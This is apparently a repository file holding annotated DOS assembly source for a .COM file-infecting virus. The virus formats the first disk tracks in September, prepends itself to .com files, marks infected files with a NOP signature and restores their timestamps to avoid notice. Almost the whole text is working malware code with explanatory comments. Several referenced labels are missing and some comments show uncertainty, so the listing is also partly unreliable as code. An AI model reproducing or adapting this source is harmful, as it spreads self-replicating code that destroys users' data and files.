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synced 2025-02-23 06:54:39 +00:00
225 lines
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225 lines
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; ---- Data Segment Values ----
; ds:[0f6h] = read buffer location
; ds:[0f8h] = write buffer location
; ds:[0fah] = store length of virus at this location
; ds:[0fch] = store length of file to be infected at this location
; ds:[0feh] = filename of file to infect
.model tiny
org 100h ; origin for .com files
nop ; these two nop instructs will be used by 'Nasty'
nop ; to determine if a file is already infected
;get date
mov ah,2ah ; get the date
int 21h ; do it
cmp dh,09h ; is it September?
jnz do_not_activate ; if NO jmp do_not_activate
;the nasty bit
;* 1. Print message
lea dx,mess ; print message
mov ah,09 ; 'Nasty in September'
int 21h ; do it
;* 2. Destroy disk
mov ah,19h ; get current drive (returned in al)
int 21h ; do it
mov dl,al ; dl = drive # to be formated
mov ah,05 ; disk format function
mov cl,01 ; first sector
mov ch,00 ; first track
mov dh,00 ; head zero
mov al,10h ; 10h (16) sectors - 2 tracks
int 13h ; do it (overwrite first 16 tracks on currently
; selected disc)
mov cx,80h ; save parameters; set counter to 80h bytes
mov si,0080h ; offset in the current data segment of the byte
; to be copied
mov di,0ff7fh ; offset to which byte is to be moved
rep movsb ; move bytes until cx=0 (decrement cx by 1 each time
; loop is performed is done automatically)
; (increment by 1 of si & di is done automatically)
lea ax,begp ; load exit from program offset address into ax
mov cx,ax ; " " " " " " " cx
sub ax,100h ; subtract start of .com file address (100h) from ax
; ax now contains the length of the virus
mov ds:[0fah],ax ; put length of the virus into the data segment at
; offset 0fah
add cx,fso ; add fso (5h) to cx (offset address of exit)
; so, cx=cx+5
mov ds:[0f8h],cx ; move cx (end of virus + 5) into data segment at
; offset 0f8h. ** Start of the write buffer.
ADD CX,AX ; add virus length (ax) to cx ?????
mov ds:[0f6h],cx ; mov cx into data segment at offset 0f6h.
; ** Start of the read buffer
mov cx,ax ; mov length of virus into cx
lea si,start ; load address of 'start' (start of virus) into
; souce index
mov di,ds:[0f8h] ; mov the value of the write buffer (@ 0f8h) into
; destination index
rb: ; cx = counter (length of virus)
; si = offset of byte to be read
; di = offset of where to write byte to
; (auto decrement of cx & increment of si & di)
rep movsb ; copy the virus into memory
stc ; set the carry flag
lea dx,file_type_to_infect ; set infector for .com files only
mov ah,4eh ; find first file with specified params
mov cx,20h ; files with archive bit set
int 21h ; do it
; if file found, CF is cleared, else
; CF is set
or ax,ax ; works the below instructions (jz & jmp)
jz file_found ; if file found jmp file_found
jmp done ; if no file found, jmp done (exit virus)
mov ah,2fh ; get dta (returned in es:bx)
int 21h ; do it
mov ax,es:[bx+1ah] ; mov size of file to be infected into ax
mov ds:[0fch],ax ; mov filesize into ds:[0fch]
add bx,1eh ; bx now points to asciz filename
mov ds:[0feh],bx ; mov filename into ds:[0feh]
clc ; clear carry flag
mov ax,3d02h ; open file for r/w (ds:dx -> asciz filename)
mov dx,bx ; mov filename into dx
int 21h ; do it (ax contains file handle)
mov bx,ax ; mov file handle into bx
mov ax,5700h ; get time & date attribs from file to infect
int 21h ; do it (file handle in bx)
push cx ; save time to the stack
push dx ; save date to the stack
mov ah,3fh ; read from file to be infected
mov cx,ds:[0fch] ; number of bytes to be read (filesize of file to
; be infected
mov dx,ds:[0f6h] ; buffer (where to read bytes to)
int 21h ; do it
mov bx,dx ; mov buffer location to bx
mov ax,[bx] ; mov contents of bx (first two bytes - as bx is
; 16-bits) into ax.
; Now check to see if file is infected... if the
; file is infected, it's first two bytes will be
; 9090h (nop nop)
sub ax,9090h ; If file is already infected, zero flag will be set
; thus jump to fin(ish)
jz fin
mov ax,ds:[0fch] ; mov filesize of file to be infected into ax
mov bx,ds:[0f6h] ; mov where-to-read-to buffer into bx
mov [bx-2],ax ; correct old len
mov ah,3ch ; Create file with handle
mov cx,00h ; cx=attribs -- set no attributes
mov dx,ds:[0feh] ; point to name
clc ; clear carry flag
int 21h ; create file
; Note: If filename already exists, (which it does)
; truncate the filelength to zero - this is ok as
; we have already copied the file to be infected
; into memory.
mov bx,ax ; mov file handle into bx
mov ah,40h ; write file with handle (write to the file to be
; infected) - length currently zero
; cx=number of bytes to write
mov cx,ds:[0fch] ; length of file to be infected
add cx,ds:[0fah] ; length of virus
mov DX,ds:[0f8h] ; location of write buffer (this contains the virus
; + the file to be infected)
int 21h ; write file
; new file = virus + file to be infected
mov ax,5701h ; restore original time & date values
pop dx ; get old date from the stack
pop cx ; get old time from the stack
int 21h ; do it
; Note: Infected file will now carry the time & date
; it had before the infection.
mov ah,3eh ; close file (bx=file handle)
int 21h ; do it
; Note: date & time stamps automatically updated if
; file written to.
stc ; set carry flags
mov ah,4fh ; find next file (.com)
int 21h ; do it
or ax,ax ; decides zero flag outcome
jnz done ; if no more .com files, jmp done
JMP file_found ; else begin re-infection process for new file.
mov cx,80h ; set counter (cx) = 80h
mov si,0ff7fh ; source offset address (copy from here)
mov di,0080h ; destination offset address (copy to here)
rep movsb ; copy bytes! (cx is auto decremented by 1
; si & di are auto incremented by 1)
; Note: this is a 'restore parameters' feature
; this does the reverse of what what done earlier
; in the program (do_not_activate:)
mov ax,0a4f3h ;
mov ds:[0fff9h],ax ;
mov al,0eah ;
mov ds:[0fffbh],al ; reset data segment locations ??? (to previous
mov ax,100h ; values before virus infection)
mov ds:[0fffch],ax ;
lea si,begp ; load exit from program offset address into si
lea di,start ; load offset address of start of virus into di
mov ax,cs
mov ds:[0fffeh],ax ; re-align cs = ds ???
mov kk,ax
mov cx,fso
db 0eah ; define byte
dw 0fff9h ; define word
kk dw 0000h ; define kk = word
mess db 'Sad virus - 24/8/91',13,10,'$' ; virus message to display
file_type_to_infect db '*?.com',0 ; infect only .com files.
fso dw 0005h ; store 5 into 'fso'. dw means that fso is 2 bytes
; in size (a word)
; ----- alma mater
mov ax,4c00h ; normal dos termination (set al to 00)
int 21h ; do it
end start